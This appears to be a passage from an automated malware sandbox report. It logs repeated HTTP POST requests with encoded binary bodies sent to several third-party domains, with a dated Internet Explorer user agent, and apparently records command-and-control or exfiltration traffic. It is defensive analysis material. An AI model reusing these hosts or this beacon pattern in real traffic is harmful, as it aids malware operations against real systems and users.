                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 69 68 62 67 57 68 58 4e 5a 51 34 57 7a 6c 34 68 2f 4c 74 64 6a 67 34 61 30 42 30 6a 54 67 30 44 47 63 75 64 57 6c 6a 38 41 39 4d 62 32 6d 4f 66 78 61 45 44 31 62 6d 52 36 4f 53 36 34 51 2b 73 46 6b 4c 66 41 37 50 78 2b 73 50 64 72 77 33 74 69 4e 76 5a 67 6f 52 53 2b 78 43 4e 58 32 4e 4b 63 50 70 4d 31 67 4e 37 43 37 78 76 69 70 6c 63 6b 44 54 6f 52 39 47 4b 76 42 58 45 4c 4f 41 54 64 34 43 49 72 34 64 6a 7a 4a 67 33 44 38 49 61 4e 67 38 62 39 70 4d 35 46 6b 66 74 38 38 67 68 73 4b 47 2f 41 2b 66 67 54 63 2f 6c 37 54 52 4e 49 4f 70 6a 63 72 35 67 52 6d 47 30 38 54 6d 72 42 52 6e 48 55 45 57 58 57 69 30 59 2f 4b 55 6e 2b 78 6e 46 35 44 34 72 34 58 78 49 4a 62 64 53 30 37 52 79 38 4f 55 41 63 6a 4a 69 4e 32 4f 42 54 75 4e 78 4c 62 78 56 54 33 6c 66 49 7a 62 74 35 4b 44 4f 56 2f 67 70 41 61 44 68 7a 47 52 54 4f 43 41 47 35 38 6c 68 63 4f 2f 4a 5a 41 68 33 54 35 66 42 53 55 46 37 33 57 41 4a 79 76 45 49 66 6c 59 63 37 64 55 56 6b 66 73 32 63 30 68 75 34 74 39 4e 6f 6f 30 57 39 70 67 42 66 61 33 43 6e 39 53 4b 35 36 78 64 74 7a 6a 67 46 6b 4d 34 47 66 5a 51 34 77 6a 34 6b 6e 48 42 49 43 75 35 4f 61 65 42 61 2b 42 4d 6f 47 64 4b 2f 66 6a 33 79 30 34 78 50 4e 72 70 6f 61 71 6b 31 78 4f 4a 74 75 52 45 36 6d 6a 42 45 48 66 36 6c 4b 39 61 49 30 66 4b 75 64 72 66 54 4b 74 7a 7a 4f 4e 74 6c 73 62 6c 56 32 5a 73 64 73 39 69 56 41 46 6d 7a 53 38 73 45 34 4f 57 35 68 65 63 6b 68 4b 33 71 6e 37 45 61 63 2f 37 76 6c 76 35 42 74 71 71 76 4d 6e 77 58 78 50 39 54 70 2f 73 6b 44 32 42 6f 2b 6b 75 50 61 79 72 35 50 74 58 54 47 68 36 71 45 65 4a 66 55 6c 49 56 7a 73 63 33 4c 56 59 41 67 63 39 49 51 4d 4c 6b 76 62 6c 74 30 44 73 63 35 2b 69 5a 73 31 45 78 53 46 43 6c 75 70 5a 42 49 57 4e 36 70 6e 74 76 43 51 30 34 38 6c 6b 6b 73 57 53 42 45 30 41 38 57 6b 3d Data Ascii: ihbgWhXNZQ4Wzl4h/Ltdjg4a0B0jTg0DGcudWlj8A9Mb2mOfxaED1bmR6OS64Q+sFkLfA7Px+sPdrw3tiNvZgoRS+xCNX2NKcPpM1gN7C7xviplckDToR9GKvBXELOATd4CIr4djzJg3D8IaNg8b9pM5Fkft88ghsKG/A+fgTc/l7TRNIOpjcr5gRmG08TmrBRnHUEWXWi0Y/KUn+xnF5D4r4XxIJbdS07Ry8OUAcjJiN2OBTuNxLbxVT3lfIzbt5KDOV/gpAaDhzGRTOCAG58lhcO/JZAh3T5fBSUF73WAJyvEIflYc7dUVkfs2c0hu4t9Noo0W9pgBfa3Cn9SK56xdtzjgFkM4GfZQ4wj4knHBICu5OaeBa+BMoGdK/fj3y04xPNrpoaqk1xOJtuRE6mjBEHf6lK9aI0fKudrfTKtzzONtlsblV2Zsds9iVAFmzS8sE4OW5heckhK3qn7Eac/7vlv5BtqqvMnwXxP9Tp/skD2Bo+kuPayr5PtXTGh6qEeJfUlIVzsc3LVYAgc9IQMLkvblt0Dsc5+iZs1ExSFClupZBIWN6pntvCQ048lkksWSBE0A8Wk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1690486980.2513919Data Raw: 36 6c 6b 48 74 37 42 72 65 51 34 44 69 79 38 39 77 34 75 78 33 57 4f 43 71 39 5a 59 37 4e 30 42 35 49 55 62 68 4a 6f 42 74 63 34 31 36 6a 51 58 59 77 2b 6b 6d 79 34 59 4c 67 50 4d 55 55 30 50 32 64 36 6e 70 2f 34 57 44 53 63 52 33 6f 63 41 56 36 41 4c 4a 71 45 2f 4b 70 6c 43 55 6d 78 70 66 43 56 78 6d 47 34 59 66 71 7a 64 65 79 32 62 2b 36 57 38 32 4e 6b 30 73 6f 39 63 66 35 48 35 4a 56 59 63 2b 73 33 71 4b 54 41 66 38 33 42 59 73 73 6d 71 30 4c 42 30 74 2f 78 62 68 74 59 6a 72 66 69 4a 76 49 6d 7a 68 79 53 67 4f 36 63 79 73 45 44 46 74 4b 32 74 32 79 48 35 37 64 53 74 45 43 43 77 54 6a 43 30 66 79 6e 6a 6e 59 36 6f 48 36 51 57 49 50 6e 32 52 57 67 4f 31 49 6c 61 75 45 72 48 37 72 53 65 50 53 67 4e 64 72 46 75 74 32 73 7a 48 36 72 79 68 72 33 45 4a 6b 2b 50 7a 74 54 4b 41 2b 7a 4d 4f 6f 70 51 32 70 56 63 44 52 67 67 49 2f 67 6b 67 55 71 46 6f 77 6f 75 50 63 4d 69 59 66 69 35 48 4c 6c 33 64 52 61 4b 32 37 4d 56 38 37 2b 73 7a 30 5a 54 75 77 61 69 62 41 6f 56 56 53 51 32 4f 37 39 6b 62 6d 35 6e 50 69 62 53 41 66 64 45 66 72 63 57 52 7a 35 34 30 67 71 32 53 33 58 58 49 79 72 6b 65 70 4f 4f 4c 6a 48 52 4c 6a 79 6e 4a 70 75 42 73 50 4a 43 6f 76 7a 2f 48 76 69 71 4d 39 39 52 7a 4f 4e 57 37 2b 55 57 65 75 30 6a 36 47 70 58 5a 75 45 45 44 4f 79 36 63 6a 59 76 43 55 46 70 76 6d 68 6e 4b 34 4d 74 5a 2f 4b 37 6e 35 46 64 6b 54 64 63 57 61 64 69 73 38 46 59 41 64 68 4c 4e 4b 6e 73 65 59 7a 47 2b 73 43 4a 4f 35 7a 30 64 56 68 4b 64 58 64 61 42 50 33 6a 4c 75 74 45 42 6b 69 31 38 71 2b 5a 59 55 30 58 4d 4d 4c 77 42 57 52 59 34 6b 77 4a 6d 79 4f 7a 32 71 58 2b 39 44 7a 46 43 48 4d 53 7a 51 50 61 53 66 54 64 54 59 33 46 42 55 65 4c 5a 7a 63 52 52 50 66 61 6c 50 68 4c 2b 68 47 59 Data Ascii: 6lkHt7BreQ4Diy89w4ux3WOCq9ZY7N0B5IUbhJoBtc416jQXYw+kmy4YLgPMUU0P2d6np/4WDScR3ocAV6ALJqE/KplCUmxpfCVxmG4Yfqzdey2b+6W82Nk0so9cf5H5JVYc+s3qKTAf83BYssmq0LB0t/xbhtYjrfiJvImzhySgO6cysEDFtK2t2yH57dStECCwTjC0fynjnY6oH6QWIPn2RWgO1IlauErH7rSePSgNdrFut2szH6ryhr3EJk+PztTKA+zMOopQ2pVcDRggI/gkgUqFowouPcMiYfi5HLl3dRaK27MV87+sz0ZTuwaibAoVVSQ2O79kbm5nPibSAfdEfrcWRz540gq2S3XXIyrkepOOLjHRLjynJpuBsPJCovz/HviqM99RzONW7+UWeu0j6GpXZuEEDOy6cjYvCUFpvmhnK4MtZ/K7n5FdkTdcWadis8FYAdhLNKnseYzG+sCJO5z0dVhKdXdaBP3jLutEBki18q+ZYU0XMMLwBWRY4kwJmyOz2qX+9DzFCHMSzQPaSfTdTY3FBUeLZzcRRPfalPhL+hGY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 56 36 5a 2f 73 35 39 64 59 41 34 7a 63 45 5a 68 2f 67 34 6f 67 53 67 5a 57 79 70 31 77 75 4a 57 51 33 63 76 6d 2b 77 33 78 51 6b 2b 75 72 65 36 7a 61 4e 50 70 38 36 4d 66 63 64 4c 51 5a 49 7a 66 55 69 71 46 37 68 45 6a 50 48 58 54 71 61 62 37 77 73 6d 58 51 47 6a 4a 5a 61 73 4f 6a 75 61 51 4d 62 34 73 52 74 42 74 6b 59 69 64 4c 5a 6f 34 45 68 30 33 72 33 34 49 38 47 39 59 56 72 73 49 72 4c 69 4f 41 73 55 74 4b 70 65 41 61 6a 46 72 68 39 67 75 54 6d 6b 6f 61 46 70 72 4c 37 2b 69 53 33 59 58 48 43 76 68 78 56 62 47 41 31 37 6f 71 6e 67 32 42 54 6e 6a 51 67 47 77 42 5a 2b 58 6f 64 6e 31 51 51 52 57 39 70 61 70 67 35 63 34 64 39 55 39 75 76 2f 4d 35 38 38 53 62 49 30 41 4e 41 67 78 33 43 68 59 42 62 71 45 58 4c 44 55 4b 72 6a 2b 44 72 33 75 36 70 66 57 4a 37 67 39 4a 70 44 50 48 41 78 4b 71 4c 52 65 4a 73 70 6e 62 75 69 47 35 79 6c 34 41 62 77 56 71 30 6c 39 4a 2b 51 5a 71 2f 51 6a 33 70 50 55 45 77 4a 52 55 44 57 79 31 53 47 53 43 37 70 34 2f 4c 42 55 4e 35 53 41 4e 67 31 74 38 2b 35 59 36 55 76 36 32 61 71 58 43 44 52 72 4e 59 6b 4e 42 52 2f 6d 54 59 51 79 59 42 48 67 53 32 5a 6d 38 62 47 45 77 4b 50 41 46 49 74 58 37 4b 68 32 4e 31 72 74 33 6c 62 4a 72 79 71 6f 4d 54 4c 70 53 37 73 71 69 55 71 49 30 77 41 43 52 6f 79 52 76 53 64 67 62 39 53 57 4b 61 4d 77 64 6a 6f 74 30 63 77 70 2f 53 46 37 41 43 63 72 53 6b 33 34 70 49 76 63 35 73 66 63 43 34 42 4a 35 79 4b 67 50 65 42 38 69 72 78 56 30 2f 37 37 6c 6c 58 70 51 4c 75 55 35 69 44 68 73 38 77 66 71 75 4c 7a 41 34 54 71 6b 79 53 67 59 67 49 65 6a 51 42 41 6b 55 36 35 47 79 59 39 61 59 53 37 65 34 49 44 66 50 34 53 47 6a 6a 69 43 78 58 78 71 61 6e 71 52 56 57 6f 55 6f 71 54 45 2b 70 70 57 79 65 43 72 74 6b 38 39 36 50 41 69 48 74 57 72 5a 70 48 31 63 3d Data Ascii: V6Z/s59dYA4zcEZh/g4ogSgZWyp1wuJWQ3cvm+w3xQk+ure6zaNPp86MfcdLQZIzfUiqF7hEjPHXTqab7wsmXQGjJZasOjuaQMb4sRtBtkYidLZo4Eh03r34I8G9YVrsIrLiOAsUtKpeAajFrh9guTmkoaFprL7+iS3YXHCvhxVbGA17oqng2BTnjQgGwBZ+Xodn1QQRW9papg5c4d9U9uv/M588SbI0ANAgx3ChYBbqEXLDUKrj+Dr3u6pfWJ7g9JpDPHAxKqLReJspnbuiG5yl4AbwVq0l9J+QZq/Qj3pPUEwJRUDWy1SGSC7p4/LBUN5SANg1t8+5Y6Uv62aqXCDRrNYkNBR/mTYQyYBHgS2Zm8bGEwKPAFItX7Kh2N1rt3lbJryqoMTLpS7sqiUqI0wACRoyRvSdgb9SWKaMwdjot0cwp/SF7ACcrSk34pIvc5sfcC4BJ5yKgPeB8irxV0/77llXpQLuU5iDhs8wfquLzA4TqkySgYgIejQBAkU65GyY9aYS7e4IDfP4SGjjiCxXxqanqRVWoUoqTE+ppWyeCrtk896PAiHtWrZpH1c=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 78 56 46 63 73 74 35 45 65 51 37 37 55 36 5a 77 4b 65 61 31 41 38 46 6c 72 6d 77 65 30 47 42 67 38 67 4b 37 70 64 4a 72 46 52 47 4b 4f 2f 53 65 41 59 6c 64 6c 6a 68 49 78 49 69 54 46 46 66 65 56 31 66 70 74 5a 52 2f 45 4f 7a 4d 57 76 32 42 77 70 32 4b 38 41 4a 68 34 6a 51 4f 64 54 64 6e 4f 33 72 66 4d 6a 2f 4a 4e 54 4a 49 38 68 31 72 70 37 75 78 35 52 34 54 44 73 56 58 33 63 5a 51 76 69 42 39 52 36 55 63 57 57 69 6e 6b 71 4a 57 75 56 48 75 65 4e 31 4a 5a 78 71 51 43 38 74 52 4c 65 33 51 36 57 4a 2f 32 78 52 55 66 45 70 4d 47 65 72 61 59 46 55 44 36 4c 6b 6b 4f 76 39 42 73 34 74 30 50 5a 77 2f 75 71 68 6f 52 53 4c 59 75 4a 65 76 66 50 72 6c 53 52 4b 74 5a 68 71 33 2b 4e 4c 47 73 51 64 72 4e 68 37 6e 2f 77 4e 76 4c 33 4f 6a 41 2b 43 38 31 4e 55 38 42 6f 4d 75 64 74 76 4b 6a 33 50 42 33 43 55 45 47 5a 58 6d 47 45 65 66 76 44 2f 32 50 6d 4e 47 6a 61 50 53 64 6c 46 70 75 33 35 5a 62 38 50 4b 33 36 38 55 71 53 4e 46 58 44 6a 48 62 57 48 6c 52 51 49 35 38 5a 69 30 61 72 52 50 5a 71 56 32 57 69 57 30 6f 68 6a 6f 6d 51 6b 61 54 68 6f 6d 67 41 6c 69 70 42 41 53 4d 55 53 59 52 58 48 59 52 6a 71 6d 54 64 54 53 57 4f 58 43 69 47 4f 34 41 44 47 62 4a 33 4c 78 4e 75 76 6a 31 59 75 34 4d 53 6c 59 43 37 30 76 71 42 6a 74 5a 36 61 4a 52 68 4f 45 6d 78 54 75 7a 6a 62 41 35 6b 35 53 6d 6b 55 63 6c 49 44 72 41 66 34 35 6f 76 6b 6b 38 36 53 42 42 46 2f 46 4f 43 47 7a 52 54 53 6b 4d 79 4f 43 32 42 4f 53 79 78 54 71 6b 58 7a 61 48 46 4d 38 55 50 53 55 64 78 4d 55 76 33 54 66 48 47 37 2b 64 34 4b 68 6e 77 62 4a 4a 6b 68 39 2b 33 5a 73 4b 57 7a 68 71 6b 79 49 73 72 75 48 79 36 49 38 2f 44 6a 7a 56 75 75 4e 50 6b 7a 4f 48 77 79 6b 4a 2f 64 37 38 36 7a 2b 6d 45 5a 79 47 4a 63 4a 66 36 68 66 62 70 69 4d 6b 31 70 38 68 30 44 44 54 30 6d 37 52 67 3d 3d Data Ascii: xVFcst5EeQ77U6ZwKea1A8Flrmwe0GBg8gK7pdJrFRGKO/SeAYldljhIxIiTFFfeV1fptZR/EOzMWv2Bwp2K8AJh4jQOdTdnO3rfMj/JNTJI8h1rp7ux5R4TDsVX3cZQviB9R6UcWWinkqJWuVHueN1JZxqQC8tRLe3Q6WJ/2xRUfEpMGeraYFUD6LkkOv9Bs4t0PZw/uqhoRSLYuJevfPrlSRKtZhq3+NLGsQdrNh7n/wNvL3OjA+C81NU8BoMudtvKj3PB3CUEGZXmGEefvD/2PmNGjaPSdlFpu35Zb8PK368UqSNFXDjHbWHlRQI58Zi0arRPZqV2WiW0ohjomQkaThomgAlipBASMUSYRXHYRjqmTdTSWOXCiGO4ADGbJ3LxNuvj1Yu4MSlYC70vqBjtZ6aJRhOEmxTuzjbA5k5SmkUclIDrAf45ovkk86SBBF/FOCGzRTSkMyOC2BOSyxTqkXzaHFM8UPSUdxMUv3TfHG7+d4KhnwbJJkh9+3ZsKWzhqkyIsruHy6I8/DjzVuuNPkzOHwykJ/d786z+mEZyGJcJf6hfbpiMk1p8h0DDT0m7Rg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 67 2f 59 64 37 5a 56 39 67 77 35 54 4a 57 67 47 66 4c 47 79 6f 49 36 65 31 2f 69 6a 69 4c 6b 52 6d 55 4d 78 49 69 41 62 75 73 70 59 4a 6b 61 35 42 42 50 51 6f 68 41 4f 49 4d 67 75 32 39 77 49 52 77 58 58 32 4c 65 2b 6e 6a 53 4d 48 57 41 56 36 49 4b 53 55 7a 36 37 50 62 34 74 73 57 4d 56 33 79 45 53 51 6f 37 75 39 71 68 4e 4a 34 75 61 69 71 50 64 68 31 51 65 58 30 48 64 64 64 48 77 70 44 37 41 2f 50 49 6f 75 54 39 6c 4a 34 54 69 74 6b 41 4e 6b 66 78 69 6b 6c 45 59 77 61 63 44 2b 73 76 31 6f 36 2b 53 6f 64 78 42 2f 62 4d 59 4e 2f 77 4e 39 68 31 4a 4d 4f 59 66 64 78 55 41 49 6f 58 6d 53 50 2f 44 51 57 65 39 43 4b 64 78 47 70 34 75 69 76 4b 58 6b 50 58 36 4e 67 4c 70 71 76 54 73 6b 35 72 4f 6d 38 35 52 6f 74 44 47 71 44 77 64 61 76 4c 4c 6a 73 49 58 49 65 61 68 70 46 44 54 36 2b 66 66 65 6a 38 4d 64 54 72 38 6a 50 6b 51 69 38 73 78 4a 79 6e 7a 49 72 47 58 30 4d 78 61 32 41 32 6c 49 4f 4c 65 58 48 56 65 59 57 55 66 6a 4e 4f 65 77 64 34 4a 61 57 65 77 76 50 35 37 33 66 4d 39 32 41 6b 44 37 30 52 47 45 44 70 6d 64 64 2b 5a 33 42 4d 44 38 5a 7a 68 43 31 64 4f 77 30 48 72 74 2f 50 6b 79 62 57 30 41 56 45 32 4a 5a 59 4c 34 67 57 75 72 76 74 33 68 2f 68 78 66 52 68 7a 78 6d 6c 4e 2f 6d 4e 66 2f 74 70 73 4a 79 47 66 78 32 52 50 6d 6d 79 4d 6a 57 59 75 4c 72 47 6a 33 45 74 4e 66 37 2b 4d 37 61 2b 38 66 78 66 56 30 77 4f 42 30 67 52 6a 59 4f 6d 44 66 76 2f 38 72 55 4e 4d 4a 61 6f 54 68 68 57 7a 6b 55 68 4e 48 5a 70 62 39 63 61 54 59 64 43 6b 75 2f 51 47 4e 51 47 68 6d 4b 56 31 65 61 66 38 39 58 42 4a 6f 31 66 56 4f 32 47 33 74 59 33 78 53 39 49 30 5a 34 35 35 58 41 42 79 79 4b 38 50 6a 4c 69 31 36 67 3d 3d Data Ascii: g/Yd7ZV9gw5TJWgGfLGyoI6e1/ijiLkRmUMxIiAbuspYJka5BBPQohAOIMgu29wIRwXX2Le+njSMHWAV6IKSUz67Pb4tsWMV3yESQo7u9qhNJ4uaiqPdh1QeX0HdddHwpD7A/PIouT9lJ4TitkANkfxiklEYwacD+sv1o6+SodxB/bMYN/wN9h1JMOYfdxUAIoXmSP/DQWe9CKdxGp4uivKXkPX6NgLpqvTsk5rOm85RotDGqDwdavLLjsIXIeahpFDT6+ffej8MdTr8jPkQi8sxJynzIrGX0Mxa2A2lIOLeXHVeYWUfjNOewd4JaWewvP573fM92AkD70RGEDpmdd+Z3BMD8ZzhC1dOw0Hrt/PkybW0AVE2JZYL4gWurvt3h/hxfRhzxmlN/mNf/tpsJyGfx2RPmmyMjWYuLrGj3EtNf7+M7a+8fxfV0wOB0gRjYOmDfv/8rUNMJaoThhWzkUhNHZpb9caTYdCku/QGNQGhmKV1eaf89XBJo1fVO2G3tY3xS9I0Z455XAByyK8PjLi16g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 77 54 77 45 73 31 4a 4b 65 51 37 79 32 47 4f 65 42 57 55 32 6a 6c 57 7a 42 77 79 69 42 4b 34 36 70 73 31 2b 55 6a 32 36 43 4e 70 57 52 61 69 54 61 71 2b 30 65 5a 78 68 33 33 5a 57 4d 63 6b 67 47 35 76 6b 53 72 68 45 75 52 58 36 42 34 35 2b 70 4c 37 38 5a 4e 30 6a 41 77 71 54 6a 6e 54 55 66 74 4c 59 65 2f 47 36 4d 6c 7a 39 36 46 66 52 37 6e 35 6f 51 68 6e 62 4e 7a 4c 55 42 4e 47 46 31 53 59 76 63 41 6b 67 7a 56 53 52 66 6e 31 61 46 31 2f 31 43 33 4d 39 46 43 6f 43 78 58 52 2f 6c 4e 66 58 79 6e 50 58 59 49 4b 35 30 58 56 4d 6d 33 6d 2f 54 47 47 67 54 2b 7a 4b 5a 73 4c 38 68 31 54 53 66 42 35 49 79 75 63 31 71 71 71 74 68 70 34 62 76 58 2f 30 41 50 77 6e 70 45 74 76 6c 47 37 62 30 2f 51 48 4f 4c 75 46 57 6a 2b 49 6a 6b 43 57 43 56 35 55 46 79 35 4a 4f 41 72 63 31 7a 2b 47 66 45 54 61 38 61 43 68 31 71 32 4a 53 72 57 57 41 4d 2f 46 4d 2f 31 4a 57 31 64 4d 77 6e 35 65 77 39 48 45 6a 69 6b 61 55 63 37 4d 64 57 7a 63 53 63 65 4a 36 74 42 67 50 32 5a 42 69 6f 5a 63 35 2b 38 65 49 6c 55 46 67 42 71 5a 77 66 45 64 67 6b 66 43 77 72 42 36 78 49 73 31 51 36 33 36 62 59 6d 31 58 68 43 45 6b 69 42 37 4b 38 37 46 48 30 58 4a 4d 35 52 4f 72 51 5a 51 4a 71 55 4d 54 6d 47 54 4f 6f 71 49 46 72 4b 45 74 62 78 4f 48 41 37 4f 48 55 2f 42 48 6d 75 39 76 6b 49 4b 32 63 6f 4e 43 69 6f 72 62 2b 4f 4b 70 32 43 73 42 65 64 59 4f 6e 63 65 57 6f 58 5a 2b 6b 67 56 73 37 4d 4e 72 30 71 69 37 50 77 5a 70 61 58 55 6e 59 36 44 6d 44 4a 56 76 36 39 2b 43 68 78 38 58 70 74 58 55 32 63 72 4a 38 65 49 49 44 6a 53 50 2f 4d 78 69 46 43 52 6f 2f 67 74 39 36 4e 79 69 67 39 50 35 43 59 77 6f 38 51 74 71 58 33 57 42 55 75 6b 42 55 63 65 70 4d 72 74 61 46 45 3d Data Ascii: wTwEs1JKeQ7y2GOeBWU2jlWzBwyiBK46ps1+Uj26CNpWRaiTaq+0eZxh33ZWMckgG5vkSrhEuRX6B45+pL78ZN0jAwqTjnTUftLYe/G6Mlz96FfR7n5oQhnbNzLUBNGF1SYvcAkgzVSRfn1aF1/1C3M9FCoCxXR/lNfXynPXYIK50XVMm3m/TGGgT+zKZsL8h1TSfB5Iyuc1qqqthp4bvX/0APwnpEtvlG7b0/QHOLuFWj+IjkCWCV5UFy5JOArc1z+GfETa8aCh1q2JSrWWAM/FM/1JW1dMwn5ew9HEjikaUc7MdWzcSceJ6tBgP2ZBioZc5+8eIlUFgBqZwfEdgkfCwrB6xIs1Q636bYm1XhCEkiB7K87FH0XJM5ROrQZQJqUMTmGTOoqIFrKEtbxOHA7OHU/BHmu9vkIK2coNCiorb+OKp2CsBedYOnceWoXZ+kgVs7MNr0qi7PwZpaXUnY6DmDJVv69+Chx8XptXU2crJ8eIIDjSP/MxiFCRo/gt96Nyig9P5CYwo8QtqX3WBUukBUcepMrtaFE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 67 2f 59 64 37 5a 56 39 67 77 35 54 4a 57 67 47 66 4c 47 79 6f 49 36 65 31 2f 69 6a 69 4c 6b 52 6d 55 4d 78 49 69 41 62 75 73 70 59 4a 6b 61 35 42 42 50 51 6f 68 41 4f 49 4d 67 75 32 39 77 49 52 77 58 58 32 4c 65 2b 6e 6a 53 4d 48 57 41 56 36 49 4b 53 55 7a 36 37 50 62 34 74 73 57 4d 56 33 79 45 53 51 6f 37 75 39 71 68 4e 4a 34 75 61 69 71 50 64 68 31 51 65 58 30 48 64 64 64 48 77 70 44 37 41 2f 50 49 6f 75 54 39 6c 4a 34 54 69 74 6b 41 4e 6b 66 78 69 6b 6c 45 59 77 61 63 44 2b 73 76 31 6f 36 2b 53 6f 64 78 42 2f 62 4d 59 4e 2f 77 4e 39 68 31 4a 4d 4f 59 66 64 78 55 41 49 6f 58 6d 53 50 2f 44 51 57 65 39 43 4b 64 78 47 70 34 75 69 76 4b 58 6b 50 58 36 4e 67 4c 70 71 76 54 73 6b 35 72 4f 6d 38 35 52 6f 74 44 47 71 44 77 64 61 76 4c 4c 6a 73 49 58 49 65 61 68 70 46 44 54 36 2b 66 66 65 6a 38 4d 64 54 72 38 6a 50 6b 51 69 38 73 78 4a 79 6e 7a 49 72 47 58 30 4d 78 61 32 41 32 6c 49 4f 4c 65 58 48 56 65 59 57 55 66 6a 4e 4f 65 77 64 34 4a 61 57 65 77 76 50 35 37 33 66 4d 39 32 41 6b 44 37 30 52 47 45 44 70 6d 64 64 2b 5a 33 42 4d 44 38 5a 7a 68 43 31 64 4f 77 30 48 72 74 2f 50 6b 79 62 57 30 41 56 45 32 4a 5a 59 4c 34 67 57 75 72 76 74 33 68 2f 68 78 66 52 68 7a 78 6d 6c 4e 2f 6d 4e 66 2f 74 70 73 4a 79 47 66 78 32 52 50 6d 6d 79 4d 6a 57 59 75 4c 72 47 6a 33 45 74 4e 66 37 2b 4d 37 61 2b 38 66 78 66 56 30 77 4f 42 30 67 52 6a 59 4f 6d 44 66 76 2f 38 72 55 4e 4d 4a 61 6f 54 68 68 57 7a 6b 55 68 4e 48 5a 70 62 39 63 61 54 59 64 43 6b 75 2f 51 47 4e 51 47 68 6d 4b 56 31 65 61 66 38 39 58 42 4a 6f 31 66 56 4f 32 47 33 74 59 33 78 53 39 49 30 5a 34 35 35 58 41 42 79 79 4b 38 50 6a 4c 69 31 36 67 3d 3d Data Ascii: g/Yd7ZV9gw5TJWgGfLGyoI6e1/ijiLkRmUMxIiAbuspYJka5BBPQohAOIMgu29wIRwXX2Le+njSMHWAV6IKSUz67Pb4tsWMV3yESQo7u9qhNJ4uaiqPdh1QeX0HdddHwpD7A/PIouT9lJ4TitkANkfxiklEYwacD+sv1o6+SodxB/bMYN/wN9h1JMOYfdxUAIoXmSP/DQWe9CKdxGp4uivKXkPX6NgLpqvTsk5rOm85RotDGqDwdavLLjsIXIeahpFDT6+ffej8MdTr8jPkQi8sxJynzIrGX0Mxa2A2lIOLeXHVeYWUfjNOewd4JaWewvP573fM92AkD70RGEDpmdd+Z3BMD8ZzhC1dOw0Hrt/PkybW0AVE2JZYL4gWurvt3h/hxfRhzxmlN/mNf/tpsJyGfx2RPmmyMjWYuLrGj3EtNf7+M7a+8fxfV0wOB0gRjYOmDfv/8rUNMJaoThhWzkUhNHZpb9caTYdCku/QGNQGhmKV1eaf89XBJo1fVO2G3tY3xS9I0Z455XAByyK8PjLi16g==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 5a 64 46 6e 37 66 78 2f 67 77 37 62 54 74 6c 30 70 39 75 32 33 59 38 30 50 73 47 55 4a 44 49 71 38 4a 41 4e 35 67 2b 77 50 78 76 4e 54 31 74 68 53 4b 6d 4d 4f 70 70 35 30 7a 6c 41 74 76 6e 5a 6c 45 62 69 38 4b 57 58 36 55 77 64 41 78 32 70 46 78 6f 6a 45 39 44 4b 58 63 68 78 44 39 64 47 55 75 7a 48 4e 77 38 6e 48 78 4b 61 5a 6a 6c 44 76 77 59 36 4e 65 41 4d 6b 49 49 78 4a 73 56 47 42 2b 72 66 55 73 4e 77 57 78 6d 64 51 57 54 6b 75 4e 6a 30 31 2b 74 50 59 54 47 58 33 30 75 43 56 4a 58 50 48 38 31 63 53 42 37 78 48 76 64 32 36 54 38 4b 4f 37 6a 43 41 33 64 6f 4d 69 78 58 34 6c 74 76 44 62 36 4d 54 52 59 67 72 51 30 59 42 41 49 4d 75 67 77 2f 66 63 6a 33 55 48 41 78 43 49 30 4a 56 50 50 53 6c 52 7a 6d 35 6c 63 78 34 6e 48 39 44 57 4e 68 5a 58 76 58 70 76 4b 30 62 59 70 41 66 7a 4d 4c 51 63 45 61 34 64 31 30 46 4d 62 49 64 36 4e 51 75 76 69 2b 4f 4b 42 6f 6b 68 33 67 4e 53 67 49 53 6c 2b 43 6b 61 44 39 67 35 2b 35 4f 42 79 79 79 57 64 68 51 6e 51 70 49 79 77 2b 6e 2f 53 5a 65 54 36 55 64 64 41 70 36 77 62 4a 44 6c 31 45 59 75 71 6a 46 2f 33 39 6d 6a 42 2f 36 66 4f 35 49 2f 63 70 4f 47 4d 73 69 71 44 46 4e 41 67 67 64 64 77 74 76 41 63 57 35 77 35 33 31 74 73 2f 74 43 76 34 52 6c 44 76 5a 53 70 6c 6c 56 71 69 37 72 2f 4a 6b 34 56 38 68 48 51 37 4d 69 6b 6a 7a 43 56 48 4c 70 39 36 72 56 34 39 37 55 72 6e 69 59 57 69 39 68 54 66 6f 71 33 46 33 6c 57 6d 31 6f 54 58 64 74 62 51 4d 41 31 31 4b 58 61 68 79 39 39 4a 67 31 32 45 58 2f 37 6c 72 48 71 44 67 59 44 4e 48 70 54 66 4f 38 4a 34 71 62 56 42 30 77 6b 51 65 67 69 47 6f 79 6e 32 42 44 59 52 55 46 44 6b 61 64 36 6c 71 